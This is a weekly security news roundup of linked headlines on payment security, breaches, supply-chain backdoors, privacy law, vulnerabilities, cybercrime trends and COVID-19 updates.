Welcome to This Week’s [in]Security. P2PE Solution Aid. More on 8-digit BINs. Supply-Chain Backdoors: CodeCov, Passwordstate, Solarwinds. New breaches: Facebook, Apple(?), ClearVoice. New Ransomware: Follow-ups & Fall-out: Privacy. Normalizing breaches. Floc Adverse. Laws & Regs: Canada: Bills C-10 & 11, regulating apps. US. UK, EU, HK. NIST iOT & ICS. CISv8. Defense: More Nation-State Patching, Moxie vs Cellebrite, Death to IoT, Passwordless, Mario and DevSecOps!? Vulnerabilities: Pulse, Chrome, SonicWall ZeroDays, Supply-chains, CyberGames, Clubhouse, Air-Drop, Docker Images, QNAP, Tesla. Updatable Encryption. Breaking Enigma. Cybercrime: Trends: TLS, QR, Sextortion, Ads, 7-Zip, ToxicEye, Pink, Fake DirectX12. Nation States. Crypto-skimming. Crime. Other Risks: Unethical patching, Social Media, Chips, Deepfake geography, Bounties, Resets, No bars! Health, Safety & Environment. Covid-19: Spread, Curves, Waves, and Variants. Response. Immunity. Covid Ugly. Covid Compliance. And more.

PCI Compliance and Payments

News and announcements relating to Payment Security, PCI, Card Brands, Payments, Payment Malware and Fraud, and Payment Related Compliance.

• The PCI Security Standards Council has published an optional P2PE Solution Inventory Template. Blog article https://blog.pcisecuritystandards.org/qa-on-the-optional-p2pe-solution-inventory-template and template https://www.pcisecuritystandards.org/documents/PCI_SSC_P2PE_Solution_Inventory_Template_Apr2021.docx
• Payment Security in South Africa: A Discussion with Stakeholders https://blog.pcisecuritystandards.org/payment-security-in-south-africa-a-discussion-with-stakeholders
• 8-Digit BINs could be a compliance problem for data-in-transit as well https://controlgap.com/blog/The-8-Digit-BINs-Strike-Again
• With the Deadline Having Passed, Less Than Half of Sellers Comply With Gas Pump EMV https://www.digitaltransactions.net/with-the-deadline-having-passed-less-than-half-of-sellers-comply-with-gas-pump-emv/
• San Francisco Becomes the Fourth Transit System to Adopt Cubic’s Contactless Payment App https://www.digitaltransactions.net/san-francisco-becomes-the-fourth-transit-system-to-adopt-cubic-transportation-systems-contactless-payment-app/

Breaches / Ransomware / Leaks

Covering breaches, leaks, data exposures, ransomware (as potential breach), and their fallout.

• Big Hacks, supply-chain compromises and widely used backdoors:

  • Backdoor Found in Codecov Bash Uploader https://www.schneier.com/blog/archives/2021/04/backdoor-found-in-codecov-bash-uploader.html
  • Codecov dev tool warns of stolen credentials from compromised script, undiscovered for two months https://www.theregister.com/2021/04/19/codecov_warns_of_stolen_credentials/
  • Hundreds of networks reportedly hacked in Codecov supply-chain attack https://www.bleepingcomputer.com/news/security/hundreds-of-networks-reportedly-hacked-in-codecov-supply-chain-attack/
  • HashiCorp is the latest victim of Codecov supply-chain attack https://www.bleepingcomputer.com/news/security/hashicorp-is-the-latest-victim-of-codecov-supply-chain-attack/
  • Backdoored password manager Passwordstate stole data from as many as 29K enterprises https://arstechnica.com/gadgets/2021/04/hackers-backdoor-corporate-password-manager-and-steal-customer-data/, https://www.bleepingcomputer.com/news/security/passwordstate-password-manager-hacked-in-supply-chain-attack/
  • Researchers Find Additional Infrastructure Used By SolarWinds Hackers https://thehackernews.com/2021/04/researchers-find-additional.html

• New Breaches:

  • A New Facebook Bug Exposes Millions of Email Addresses https://www.wired.com/story/new-facebook-bug-exposes-millions-of-email-addresses
  • REvil ransomware gang claims it stole top-secret tech designs – including Apple lappies – from Quanta Computer https://www.theregister.com/2021/04/21/ransomware_gang_extorts_apple/
  • Brace yourselves. Facebook has a new mega-leak on its hands https://arstechnica.com/gadgets/2021/04/tool-links-email-addresses-to-facebook-accounts-at-scale/
  • Logins for 1.3 million Windows RDP servers collected from hacker market https://www.bleepingcomputer.com/news/security/logins-for-13-million-windows-rdp-servers-collected-from-hacker-market/
  • ClearVoice Surveys - 15,074,786 breached accounts https://haveibeenpwned.com/PwnedWebsites#ClearVoiceSurveys
  • Phone House España - 5,223,350 breached accounts https://haveibeenpwned.com/PwnedWebsites#PhoneHouse
  • Volunteer-run pirate Manga website attacked, loses 3M hashed passwords, has ‘nobody’ to fix the mess https://www.theregister.com/2021/04/26/mangadex_data_breach/ and https://haveibeenpwned.com/PwnedWebsites#MangaDex
  • ER Physician Association Hacked https://www.databreachtoday.com/er-physician-association-hacked-a-16453
  • Geico data breach exposed customers' driver's license numbers https://www.bleepingcomputer.com/news/security/geico-data-breach-exposed-customers-drivers-license-numbers/
  • Kansas Department of Labor looking into possible data breach https://www.databreaches.net/kansas-department-of-labor-looking-into-possible-data-breach/
  • Al: Election Data Breach Story Renews Press Freedom Debate in Albania https://www.databreaches.net/al-election-data-breach-story-renews-press-freedom-debate-in-albania/
  • AU: Service NSW kept victims in dark after hackers stole personal data https://www.databreaches.net/au-service-nsw-kept-victims-in-dark-after-hackers-stole-personal-data/
  • FL: Hackers post 26,000 Broward school files online https://www.databreaches.net/fl-hackers-post-26000-broward-school-files-online/

• New Ransomware and "Incidents":

  • Illinois Attorney General’s Office hit by ransomware? State investigating. https://www.databreaches.net/illinois-attorney-generals-office-hit-by-ransomware-state-investigating/

• Follow-ups and fall-out:

  • Ca: Court approves data breach settlements with BMO, CIBC https://www.databreaches.net/ca-court-approves-data-breach-settlements-with-bmo-cibc/
  • Hacker leaks 20 million alleged BigBasket user records for free https://www.bleepingcomputer.com/news/security/hacker-leaks-20-million-alleged-bigbasket-user-records-for-free/
  • ShopBack - 20,529,819 breached accounts https://haveibeenpwned.com/PwnedWebsites#ShopBack
  • School Nutrition Vendor Sued for Compromise of 867,209 K-12 Student Records https://www.databreaches.net/school-nutrition-vendor-sued-for-compromise-of-867209-k-12-student-records/

Privacy

Articles about privacy related news, risks, and trends.

• Facebook leaks strategy to numb reaction to data scraping incidents https://www.bleepingcomputer.com/news/security/facebook-leaks-strategy-to-numb-reaction-to-data-scraping-incidents/
• Would be so cool if everyone normalized these pesky data leaks, says data-leaking Facebook in leaked memo https://www.theregister.com/2021/04/20/facebook_data_breach/
• Microsoft disables Google's FLoC tracking in Microsoft Edge, for now https://www.bleepingcomputer.com/news/microsoft/microsoft-disables-googles-floc-tracking-in-microsoft-edge-for-now/
• What the FLoC?! https://scotthelme.co.uk/what-the-floc/
• Samsung wants to make sure nobody’s tracking you with its SmartTags https://www.theverge.com/2021/4/20/22392924/samsung-smartags-tracker-bixby-privacy-smartthings
• TikTok vs Douyin A Security and Privacy Analysis https://citizenlab.ca/2021/03/tiktok-vs-douyin-security-privacy-analysis/
• Cloudflare obtains new ISO/IEC 27701:2019 privacy certification and what that means for you https://blog.cloudflare.com/iso-27701-privacy-certification/
• CryptGPU: Fast Privacy-Preserving Machine Learning on the GPU, by Sijun Tan and Brian Knott and Yuan Tian and David J. Wu https://eprint.iacr.org/2021/533

Laws, Regulations, Platforms, Standards, and Public Policy

News about laws, regulations, platform rules, and standards affecting security, privacy, technology, and public interest.

• Canada:

  • Not Just User Generated Content: Liberal Government Also Want the CRTC to Regulate Apps Under Bill C-10 https://www.michaelgeist.ca/2021/04/not-just-user-generated-content-liberals-also-want-the-crtc-to-regulate-apps-under-bill-c-10/
  • Bill C-11 Explained https://citizenlab.ca/2021/04/bill-c-11-explained/
  • Freedom of Expression Under Attack: The Liberal Government Moves to Have the CRTC Regulate All User Generated Content https://www.michaelgeist.ca/2021/04/freedom-of-expression-under-attack-the-liberal-government-moves-to-have-the-crtc-regulate-all-user-generated-content/
  • Canada’s Proposed Privacy Law Reforms Are Not Enough: A Path to Improving Organizational Transparency and Accountability https://citizenlab.ca/2021/04/canadas-proposed-privacy-law-reforms-are-not-enough-improving-organizational-transparency-and-accountability-bill-c11/
  • The real winners of Thursday's CRTC decision? Telecom companies, observers say https://www.cbc.ca/news/business/crtc-mvno-reaction-1.5990465
  • The Law Bytes Podcast, Episode 84: Dwayne Winseck and Ben Klass on Canada’s Wireless Woes https://www.michaelgeist.ca/2021/04/law-bytes-podcast-episode-84/

• US:

  • EFF and ACLU Ask Supreme Court to Review Case Against Warrantless Searches of International Travelers’ Phones and Laptops https://www.eff.org/press/releases/eff-and-aclu-ask-supreme-court-review-case-against-warrantless-searches-international
  • When Is Online Nastiness Illegal? https://www.nytimes.com/2021/04/23/technology/online-speech.html
  • Your Service Provider’s Terms of Service Shouldn’t Overrule Your Fourth Amendment Rights https://www.eff.org/deeplinks/2021/04/your-service-providers-terms-service-shouldnt-overrule-your-fourth-amendment
  • As States Offer Data Breach ‘Safe Harbors,’ Not All Companies Are Receptive https://www.databreaches.net/as-states-offer-data-breach-safe-harbors-not-all-companies-are-receptive/
  • Florida House of Representatives Passes Florida Privacy Protection Act https://epic.org/2021/04/florida-house-of-representativ.html
  • EFF Sues Proctorio on Behalf of Student It Falsely Accused of Copyright Infringement to Get Critical Tweets Taken Down https://www.eff.org/press/releases/eff-sues-proctorio-behalf-student-it-falsely-accused-copyright-infringement-get
  • One judge turned Waco, Texas into the go-to city for Big Tech patent lawsuits, with nearly 800 cases in the past year, and no end in sight https://www.businessinsider.com/patent-lawsuits-trolls-moving-texas-waco-new-judge-big-tech-2021-4
  • Reddit faces lawsuit for failing to remove child sexual abuse material https://www.theverge.com/2021/4/25/22399306/reddit-lawsuit-child-sexual-abuse-material-fosta-sesta-section-230

• World:

  • Europe Proposes Strict Rules for Artificial Intelligence https://www.nytimes.com/2021/04/16/business/artificial-intelligence-regulation.html
  • TikTok sued for billions over children’s data by former children’s commissioner https://www.independent.co.uk/life-style/gadgets-and-tech/tiktok-billions-lawsuit-illegal-children-data-b1835142.html
  • Why Europe Is Hard on Big Tech https://www.nytimes.com/2021/04/22/technology/europe-tech-regulations.html
  • Bad software sent postal workers to jail, because no one wanted to admit it could be wrong https://www.theverge.com/2021/4/23/22399721/uk-post-office-software-bug-criminal-convictions-overturned
  • Won't somebody please think of the children!!! UK to mount fresh assault on end-to-end encryption in Facebook https://www.theregister.com/2021/04/19/uk_anti_encryption/
  • Hong Kong's zealous anti-doxxing campaign could make it even easier to hide dirty money in the city https://www.cnn.com/2021/04/19/business/hong-kong-companies-registry-dst-intl-hnk/index.html

• Standards News:

  • NIST is updating their Industrial Control Systems (ICS) Security guidance to incorporate lessons and will be accepting comments until May 28th SP 800-82 rev 3 https://csrc.nist.gov/publications/detail/sp/800-82/rev-3/draft
  • NIST’s National Cybersecurity Center of Excellence (NCCoE) Preliminary Draft of IoT Special Publication (SP) 1800-32, Volumes A and B is open for comments until May 24th https://csrc.nist.gov/publications/detail/sp/1800-32/draft
  • CIS Controls v8 https://www.sans.org/blog/cis-controls-v8

Defense / Techniques / Solutions

Covering developments and opportunities that may help improve security.

• Brit authorities could legally do an FBI and scrub malware from compromised boxen without your knowledge https://www.theregister.com/2021/04/19/ncsc_exchange_server_legal_powers_question/
• Emotet malware forcibly removed today by German police update https://www.databreaches.net/emotet-malware-forcibly-removed-today-by-german-police-update/
• What COVID-19 Taught Us: Prepping Cybersecurity for the Next Crisis https://threatpost.com/covid-19-prepping-cybersecurity-crisis/165472/
• Windows 10 now lets you seamlessly run Linux GUI apps https://www.bleepingcomputer.com/news/microsoft/windows-10-now-lets-you-seamlessly-run-linux-gui-apps/
• Signal app's Moxie says it's possible to sabotage Cellebrite's phone-probing tools with booby-trapped file https://www.theregister.com/2021/04/21/signal_cellebrite/, https://arstechnica.com/information-technology/2021/04/in-epic-hack-signal-developer-turns-the-tables-on-forensics-firm-cellebrite/
• New Fido Protocol Simplifies IoT Device Onboarding https://www.databreachtoday.com/new-fido-protocol-simplifies-iot-device-onboarding-a-16449
• UK.gov wants mobile makers to declare death dates for their new devices from launch https://www.theregister.com/2021/04/21/ukgov_death_dates_smartphones_iot_security/
• Passwordless: More Mirage Than Reality https://thehackernews.com/2021/04/passwordless-more-mirage-than-reality.html
• How we fought bad apps and developers in 2020 https://security.googleblog.com/2021/04/how-we-fought-bad-apps-and-developers.html
• Honeypot analysis: Base64 Hashes Used in Web Scanning, (Sat, Apr 24th) https://isc.sans.edu/diary/rss/27346
• Designing sockfuzzer, a network syscall fuzzer for XNU https://googleprojectzero.blogspot.com/2021/04/designing-sockfuzzer-network-syscall.html
• Meet Thistle, the startup that wants to secure billions of IoT devices https://arstechnica.com/information-technology/2021/04/meet-thistle-the-startup-that-wants-to-secure-billions-of-iot-devices/
• Looking for Greater Security Culture? Ask an 8-Bit Plumber https://www.darkreading.com/application-security/looking-for-greater-security-culture-ask-an-8-bit-plumber/a/d-id/1340751
• MITRE Engenuity ATT&CK® Evaluation proves Microsoft Defender for Endpoint stops advanced attacks across platforms https://www.microsoft.com/security/blog/2021/04/21/mitre-engenuity-attck-evaluation-proves-microsoft-defender-for-endpoint-stops-advanced-attacks-across-platforms/

Bugs / Design Flaws / Vulnerabilities / Research

Articles about newly discovered vulnerabilities and research.

• CVE-2021-22893: Zero-Day Vulnerability in Pulse Connect Secure Exploited in the Wild https://www.tenable.com/blog/cve-2021-22893-zero-day-vulnerability-in-pulse-connect-secure-exploited-in-the-wild
• Update Your Chrome Browser ASAP to Patch a Week Old Public Exploit https://thehackernews.com/2021/04/update-your-chrome-browser-immediately.html
• WARNING: Hackers Exploit Unpatched Pulse Secure 0-Day to Breach Organizations https://thehackernews.com/2021/04/warning-hackers-exploit-unpatched-pulse.html
• Google Chrome Hit in Another Mysterious Zero-Day Attack https://www.securityweek.com/google-chrome-hit-another-mysterious-zero-day-attack
• SonicWall warns customers to patch 3 zero-days exploited in the wild https://www.bleepingcomputer.com/news/security/sonicwall-warns-customers-to-patch-3-zero-days-exploited-in-the-wild/
• Three Zero-Day Flaws in SonicWall Email Security Product Exploited in Attacks https://www.securityweek.com/three-zero-day-flaws-sonicwall-email-security-product-exploited-attacks
• Spotlight on Cybercriminal Supply Chains https://threatpost.com/spotlight-on-the-cybercriminal-supply-chains/165552/
• US Cyber Games announced to piut together a team for capture the flag competitions (Very cool but Cyberathletes? ) https://www.uscybergames.com/
• A Clubhouse Bug Let People Lurk in Rooms Invisibly https://www.wired.com/story/clubhouse-bug-lurkers-ghost
• Apple, you've AirDrop'd the ball: Academics detail ways to leak contact info of nearby iThings for spear-phishing https://www.theregister.com/2021/04/22/airdrop_contact_leaks/
• Critical RCE Bug Found in Homebrew Package Manager for macOS and Linux https://thehackernews.com/2021/04/critical-rce-bug-found-in-homebrew.html
• How Safe Are Your Docker Images?, (Thu, Apr 22nd) https://isc.sans.edu/diary/rss/27340
• If you have a QNAP NAS, stop what you're doing right now and install latest updates. Do it before Qlocker gets you https://www.theregister.com/2021/04/22/qnap_nas_ransomware_qlocker_ech0raix/
• Flawed credential storage in top Android apps puts users at risk https://www.comparitech.com/blog/information-security/flawed-credential-storage-android-apps/
• Tesla’s Autopilot is ‘easily’ tricked into working without anyone in the driver’s seat https://www.theverge.com/2021/4/22/22397546/tesla-autopilot-consumer-report-test-no-driver
• Firefox 88 combats window.name privacy abuses https://blog.mozilla.org/security/2021/04/19/firefox-88-combats-window-name-privacy-abuses/
• Mozilla Fixes Firefox Flaw That Allowed Spoofing of HTTPS Browser Padlock https://threatpost.com/mozilla-fixes-firefox-flaw/165501/
• Attackers can hide 'external sender' email warnings with HTML and CSS https://www.bleepingcomputer.com/news/security/attackers-can-hide-external-sender-email-warnings-with-html-and-css/
• Vulnerability Spotlight: Code execution vulnerabilities in PrusaSlicer https://blog.talosintelligence.com/2021/04/vuln-spotlight-.html
• Vulnerability Spotlight: Remote code execution vulnerabilities in Cosori smart air fryer https://blog.talosintelligence.com/2021/04/vuln-spotlight-co.html
• Over 580 WordPress Vulnerabilities Disclosed in 2020: Report https://www.securityweek.com/over-580-wordpress-vulnerabilities-disclosed-2020-report
• Security Researcher Dan Kaminsky Passes Away https://www.securityweek.com/security-researcher-dan-kaminsky-passes-away
• A Composable Look at Updatable Encryption, by Françoise Levy-dit-Vehel and Maxime Roméas https://eprint.iacr.org/2021/538
• Video on breaking the Enigma cipher machine in 2021 cipher text only attack https://www.youtube.com/watch?v=RzWB5jL5RX0

Hacking / Malware / Cybercrime / Exploitation

News covering active trends, alerts, events.

• Trends, Alerts, and Events (other than major breaches):

  • Half of Q1's malware traffic observed by Sophos was TLS encrypted, hiding inside legit requests to legit services https://www.theregister.com/2021/04/21/sophos_research/
  • QR Codes Offer Easy Cyberattack Avenues as Usage Spikes https://threatpost.com/qr-codes-cyberattack-usage-spikes/165526/
  • The latest sextortion tactic, how to help your kids prevent and report it https://globalnews.ca/news/7777262/sextortion-cybertip-youth-crime-teen-offenders-nudes-blackmail/
  • 120 Compromised Ad Servers Target Millions of Internet Users https://thehackernews.com/2021/04/120-compromised-ad-servers-target.html
  • Millions of web surfers are being targeted by a single malvertising group https://arstechnica.com/information-technology/2021/04/malvertisers-use-120-hacked-ad-servers-to-target-millions-of-web-surfers/
  • A ransomware gang made $260,000 in 5 days using the 7zip utility https://www.bleepingcomputer.com/news/security/a-ransomware-gang-made-260-000-in-5-days-using-the-7zip-utility/
  • Massive Qlocker ransomware attack uses 7zip to encrypt QNAP devices https://www.bleepingcomputer.com/news/security/massive-qlocker-ransomware-attack-uses-7zip-to-encrypt-qnap-devices/
  • Cybercriminals Using Telegram Messenger to Control ToxicEye Malware https://thehackernews.com/2021/04/cybercriminals-using-telegram-messenger.html
  • WhatsApp Pink malware can now auto-reply to your Signal, Telegram texts https://www.bleepingcomputer.com/news/security/whatsapp-pink-malware-can-now-auto-reply-to-your-signal-telegram-texts/
  • Fake Microsoft DirectX 12 site pushes crypto-stealing malware https://www.bleepingcomputer.com/news/security/fake-microsoft-directx-12-site-pushes-crypto-stealing-malware/
  • Google Alerts continues to be a hotbed of scams and malware https://www.bleepingcomputer.com/news/security/google-alerts-continues-to-be-a-hotbed-of-scams-and-malware/
  • Google Play apps steal texts and pepper you with unauthorized purchases https://arstechnica.com/gadgets/2021/04/google-play-apps-with-700k-installs-steal-texts-and-charge-you-money/
  • Malware That Spreads Via Xcode Projects Now Targeting Apple's M1-based Macs https://thehackernews.com/2021/04/malware-spreads-via-xcode-projects-now.html

• Nation State Actors:

  • China broke into govt, defense, finance networks via zero-day in Pulse Secure VPN gateways? No way https://www.theregister.com/2021/04/20/china_pulse_connect_secure_vpn/
  • Japan accuses Chinese military of cyber-attacks on its space agency https://www.theregister.com/2021/04/21/japan_accuses_china_of_attacking_jaxa/
  • Lazarus APT Hackers are now using BMP images to hide RAT malware https://thehackernews.com/2021/04/lazarus-apt-hackers-are-now-using-bmp.html
  • Nation-State Actor Linked to Pulse Secure Attacks https://www.databreachtoday.com/nation-state-actor-linked-to-pulse-secure-attacks-a-16437
  • North Korean hackers adapt web skimming for stealing Bitcoin https://www.bleepingcomputer.com/news/security/north-korean-hackers-adapt-web-skimming-for-stealing-bitcoin/
  • On North Korea’s Cyberattack Capabilities https://www.schneier.com/blog/archives/2021/04/on-north-koreas-cyberattack-capabilities.html
  • Facebook Busts Palestinian Hackers' Operation Spreading Mobile Spyware https://thehackernews.com/2021/04/facebook-busts-palestinian-hackers.html
  • Facebook Says Palestinian Intelligence Used Platform to Spy on Citizens https://www.securityweek.com/facebook-says-palestinian-intelligence-used-platform-spy-citizens

• Crime & Arrests, etc.:

  • Did Huawei Eavesdrop on KPN Mobile Network? https://www.databreachtoday.com/blogs/did-huawei-eavesdrop-on-kpn-mobile-network-p-3019
  • FBI used facial recognition to identify a Capitol rioter from his girlfriend’s Instagram posts https://www.theverge.com/2021/4/21/22395323/fbi-facial-recognition-us-capital-riots-tracked-down-suspect
  • FBI Warns Cyber Criminals Are Using Fake Job Listings to Target Applicants’ Personally Identifiable Information https://www.databreaches.net/fbi-warns-cyber-criminals-are-using-fake-job-listings-to-target-applicants-personally-identifiable-information/
  • Guelph police use their own ruse to get back iPad bought with fake cash https://globalnews.ca/news/7783071/toronto-man-ipad-fake-money-guelph/
  • Pupil hacked into computer and changed their grades after teacher left their password on a note stuck to a laptop – as GCHQ begins cyber security training for school staff https://www.databreaches.net/pupil-hacked-into-computer-and-changed-their-grades-after-teacher-left-their-password-on-a-note-stuck-to-a-laptop-as-gchq-begins-cyber-security-training-for-school-staff/

Other Security / Risk

Articles covering other types of risks.

• Linux bans University of Minnesota for committing malicious code in unethical study https://www.bleepingcomputer.com/news/security/linux-bans-university-of-minnesota-for-committing-malicious-code/, and https://blog.erratasec.com/2021/04/ethics-university-of-minnesotas-hostile.html
• The social networks ‘designed to tear us apart’ – podcasts of the week https://www.theguardian.com/tv-and-radio/2021/apr/23/the-social-networks-designed-to-tear-us-apart-podcasts-of-the-week
• A Computer Chip Shortage Has Hobbled the Auto Industry https://www.nytimes.com/2021/04/23/business/auto-semiconductors-general-motors-mercedes.html
• A growing problem of ‘deepfake geography’: How AI falsifies satellite images https://scienmag.com/a-growing-problem-of-deepfake-geography-how-ai-falsifies-satellite-images/
• American Police Are Inadequately Trained https://www.theatlantic.com/politics/archive/2021/04/daunte-wright-and-crisis-american-police-training/618649/
• Beware of bug bounty hidden risk and liabilities https://www.darkreading.com/vulnerabilities---threats/beware-the-bug-bounty/a/d-id/1340658
• Cisco says computer chip shortage to last six months https://www.bbc.co.uk/news/technology-56847518
• Russian Security Vendor Positive Technologies Dropped From MAPP Member List https://www.securityweek.com/russian-security-vendor-positive-technologies-responds-us-sanctions
• Cost of Account Unlocks, and Password Resets Add Up https://thehackernews.com/2021/04/cost-of-account-unlocks-and-password.html
• The Delicate Balance of Security Versus Usability https://blog.isc2.org/isc2_blog/2021/04/the-delicate-balance-of-security-versus-usability.html
• (Software upgrade gone wrong) Rogers is down: Canadian users report voice and data outages https://www.bleepingcomputer.com/news/mobile/rogers-is-down-canadian-users-report-voice-and-data-outages/
• (A uniquely Canadian outage) Beavers chew through 4.5-inch thick tube, disrupting internet service for 900 B.C. customers https://bc.ctvnews.ca/beavers-chew-through-4-5-inch-thick-tube-disrupting-internet-service-for-900-b-c-customers-1.5401615
• Canada's aging critical infrastructure strategy an increasing concern, say cybersecurity experts https://ottawacitizen.com/news/canada/canadas-aging-critical-infrastructure-an-increasing-concern-say-cybersecurity-experts/wcm/861aceef-c292-437c-a0ed-9707acd24cee
• The Big Pentagon Internet Mystery Now Partially Solved https://www.securityweek.com/big-pentagon-internet-mystery-now-partially-solved
• How many layers of copyright infringement are in Emily Ratajkowski’s new NFT? https://www.theverge.com/2021/4/24/22399790/emily-ratajkowski-nft-christies-copyright-nightmare-richard-prince
• Stranded sailor allowed to leave abandoned ship after four years https://www.bbc.co.uk/news/world-middle-east-56842506
• They Hacked McDonald’s Ice Cream Machines—and Started a Cold War https://www.wired.com/story/they-hacked-mcdonalds-ice-cream-makers-started-cold-war
• Italian hospital employee accused of skipping work for 15 years https://www.bbc.co.uk/news/world-europe-56822571

• Health, Safety & Environment:

  • How lessons from past emergencies could improve the pandemic response https://scienmag.com/how-lessons-from-past-emergencies-could-improve-the-pandemic-response/
  • Malaria vaccine hailed as potential breakthrough https://www.bbc.co.uk/news/health-56858158
  • Federal oversight of natural health products leaving Canadians at risk: report https://globalnews.ca/news/7783257/federal-oversight-canadian-natural-health-products/
  • Chernobyl radiation damage 'not passed to children' https://www.bbc.co.uk/news/science-environment-56846728
  • Disgusting Study Shows What Happens in The Air When You Flush a Public Toilet https://www.sciencealert.com/horrifying-study-shows-why-you-shouldn-t-linger-when-you-flush-a-public-toilet
  • Does listening to calming music at bedtime actually help you sleep? https://scienmag.com/does-listening-to-calming-music-at-bedtime-actually-help-you-sleep/
  • US aviation regulator warns of mid-air collision risk if Garmin TCAS boxes are not updated https://www.theregister.com/2021/04/22/garmin_tcas_software_collision_risks_faa/
  • Why the Fire Pole Is Beginning to Disappear https://www.mentalfloss.com/article/643965/fire-pole-history-facts
  • Saskatchewan’s workplace total injury rate decreased by 10% in 2020: WCB https://globalnews.ca/news/7778378/saskatchewan-workplace-injury-rate-decreased-2020-wcb/
  • Peloton treadmill accidents spark push to change product safety law https://www.theverge.com/2021/4/22/22397884/peloton-treadmill-accident-hazard-cpsc-democrats-congress-consumer-safety
  • Firearms laws curb rates of gun violence across United States https://scienmag.com/firearms-laws-curb-rates-of-gun-violence-across-united-states/
  • Woman’s eye glued shut after mistaking nail glue for eyedrops https://globalnews.ca/news/7783137/woman-eye-glue-eyedrops-superglue-contact-lenses/
  • Explosive gender reveal party shakes houses miles away https://www.bbc.co.uk/news/newsbeat-56861212
  • Space junk map tracks 200 ‘ticking time bombs’ https://www.bbc.co.uk/news/science-environment-56845104
  • SpaceX says OneWeb spread false story of “near-miss” satellite collision https://arstechnica.com/information-technology/2021/04/spacex-says-oneweb-spread-false-story-of-near-miss-satellite-collision/
  • Plastics Can Be Broken Down Into Fuel, And We Just Found a Great Method For It https://www.sciencealert.com/scientists-create-a-better-way-to-break-down-plastics-into-fuel
  • X-Prize Winners Use CO2 Emissions to Make Concrete https://www.scientificamerican.com/article/x-prize-winners-use-co2-emissions-to-make-concrete/
  • Climate change: Carbon 'surge' expected in post-Covid energy boom https://www.bbc.co.uk/news/science-environment-56805255
  • How bad are NFTs for the environment? https://www.independent.co.uk/climate-change/sustainable-living/nft-environment-climate-change-crypto-b1835220.html
  • Hawaii lawmakers just approved a measure to fine people $500 for intentionally releasing balloons into the atmosphere https://www.businessinsider.com/hawaii-moves-forward-to-fine-people-for-releasing-balloons-2021-4

COVID-19 updates.

COVID related articles. We have been following coronavirus risks since https://controlgap.com/blog/this-weeks-insecurity-issue-147.

• AI unlocks ancient Dead Sea Scrolls mystery https://www.bbc.co.uk/news/world-middle-east-56842712
• Algorithm Virtually Unfolds a Historical Letter without Unsealing It https://www.scientificamerican.com/article/algorithm-virtually-unfolds-a-historical-letter-without-unsealing-it/

• The spread, curves, spikes, waves, reinfection, and variant strains:

  • Canada surpasses 12 million COVID-19 vaccine jabs as rollout picks up speed https://globalnews.ca/news/7795994/covid-vaccines-12-million-canada-rollout/
  • COVID-19 infections in Ontario shoot back up past 4,200, ICU admissions near 800 https://toronto.ctvnews.ca/covid-19-infections-in-ontario-shoot-back-up-past-4-200-icu-admissions-near-800-1.5396099
  • Ontario reports 4,505 new COVID-19 cases, 34 deaths https://globalnews.ca/news/7782804/covid-19-ontario-coronavirus-cases-april-23/
  • Rise in sudden COVID-19 deaths at home still a mystery, Ontario chief coroner says https://globalnews.ca/news/7784320/rise-in-sudden-covid-deaths-at-home-ontario/
  • ‘Assume that they might have COVID’: Peel’s top doctor says after 22% test positivity in Brampton https://globalnews.ca/news/7776427/brampton-covid-test-positivity/
  • ‘It’s over’: India COVID-19 patients suffocate as cases surge during oxygen shortage https://globalnews.ca/news/7786158/india-coronavirus-patients-oxyegen-shortage/
  • India is shattering global COVID-19 infection rates. Here’s why https://globalnews.ca/news/7779609/india-covid-rates-explainer/
  • India's Massive COVID Surge Puzzles Scientists https://www.scientificamerican.com/article/indias-massive-covid-surge-puzzles-scientists/
  • Prince Albert ‘Freedom Rally’ attendees told to self-isolate after increased COVID-19 exposure https://globalnews.ca/news/7785832/self-isolation-covid-exposure-prince-albert-rally/
  • Mount Everest: Coronavirus reaches world's tallest peak https://www.bbc.co.uk/news/world-asia-56854986
  • A COVID triple-mutant found in India could be much more deadly, and may be resistant to existing vaccines https://www.businessinsider.com/covid-triple-mutant-in-india-could-be-much-more-deadly-2021-4
  • There’s a new 'double mutant' COVID-19 variant in India. How worried should we be? https://nationalpost.com/news/world/theres-a-new-double-mutant-covid-19-variant-in-india-how-worried-should-we-be
  • COVID-19 variant first detected in India found in Canada. What we know so far https://globalnews.ca/news/7780851/india-covid-variant-canada-cases/

• Guidance, Response, and Recovery:

  • No Digital Vaccine Bouncers https://www.eff.org/deeplinks/2021/04/no-digital-vaccine-bouncers
  • Canada's border restrictions to remain in place another month, at least https://www.ctvnews.ca/canada/canada-s-border-restrictions-to-remain-in-place-another-month-at-least-1.5394551
  • COMMENTARY: Canada’s response to coronavirus variants does not inspire confidence https://globalnews.ca/news/7785488/commentary-canada-response-coronavirus-variants/
  • 'There's not a lot of give left in the system': ORNGE patient transfers surge to keep GTA hospitals afloat https://toronto.ctvnews.ca/there-s-not-a-lot-of-give-left-in-the-system-ornge-patient-transfers-surge-to-keep-gta-hospitals-afloat-1.5398072
  • Ontario's science table calls for stronger measures to control COVID-19 pandemic https://toronto.ctvnews.ca/ontario-s-science-table-calls-for-stronger-measures-to-control-covid-19-pandemic-1.5395032
  • One of Ontario's top scientific advisers says he considered quitting after latest COVID-19 restrictions https://www.ctvnews.ca/health/coronavirus/one-of-ontario-s-top-scientific-advisers-says-he-considered-quitting-after-latest-covid-19-restrictions-1.5394378
  • Ontario's top doctor issues directive to cease all non-emergency surgeries immediately https://toronto.ctvnews.ca/ontario-s-top-doctor-issues-directive-to-cease-all-non-emergency-surgeries-immediately-1.5397319
  • Infectious disease specialist cautions Edmontonians against visiting enclosed patio tents https://globalnews.ca/news/7781865/covid-19-infectious-disease-specialist-enclosed-patio-tents/
  • U.S. upgrades Canada to ‘do not travel’ status amid soaring COVID-19 numbers https://globalnews.ca/news/7773469/covid-us-canada-travel-advisory/
  • The UK's 'red list' now bars travel from India to contain the spread of COVID-19 variants. Here's what it means, which countries are on the list and how it works. https://www.businessinsider.com/india-on-uk-travel-red-list-covid-19-variant-cases-surge-2021-4
  • Coronavirus: Japan declares virus emergency in Tokyo as Olympics near https://www.bbc.co.uk/news/world-asia-56864319

• Immunity and Vaccinations:

  • For Vaccine Passports, Less Tech Is Best https://www.nytimes.com/2021/04/20/technology/vaccine-passports-privacy.html
  • Two Cases of COVID-19 'Vaccine Breakthrough' Infection Confirmed in The US https://www.sciencealert.com/two-cases-of-covid-19-vaccine-breakthrough-infection-have-been-confirmed
  • Shifting more vaccines to hot spots will help reduce hospitalizations, deaths: Ontario science table https://globalnews.ca/news/7785537/ontario-science-table-more-covid-vaccines-hot-spots/
  • What you can and can’t do once you’ve received your 1st COVID-19 vaccine dose https://globalnews.ca/news/7769047/what-canadians-can-do-covid-vaccination/
